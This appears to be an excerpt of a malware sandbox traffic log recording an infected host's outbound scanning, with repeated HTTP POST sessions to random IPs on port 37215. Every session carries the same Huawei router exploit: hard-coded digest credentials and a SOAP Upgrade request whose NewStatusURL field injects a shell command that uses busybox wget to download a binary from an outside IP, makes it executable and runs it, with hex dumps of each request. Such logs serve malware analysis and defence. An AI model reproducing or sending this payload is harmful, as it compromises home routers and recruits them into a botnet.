                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2203192.168.2.1533000186.109.216.13837215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.131582022 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2204192.168.2.1541688156.208.240.20237215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.131619930 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2205192.168.2.153758031.35.188.20637215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.131664991 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2206192.168.2.1560750190.191.28.3437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.131887913 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2207192.168.2.1537082181.167.126.10137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.131887913 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2208192.168.2.155386637.63.20.24537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.131932020 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2209192.168.2.1556968181.150.57.037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.132008076 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2210192.168.2.1546886156.77.209.21537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.132013083 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2211192.168.2.1536262222.68.193.2637215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.132226944 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2212192.168.2.1558344138.91.20.4237215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.132240057 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2213192.168.2.1555672157.119.5.8437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.132358074 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
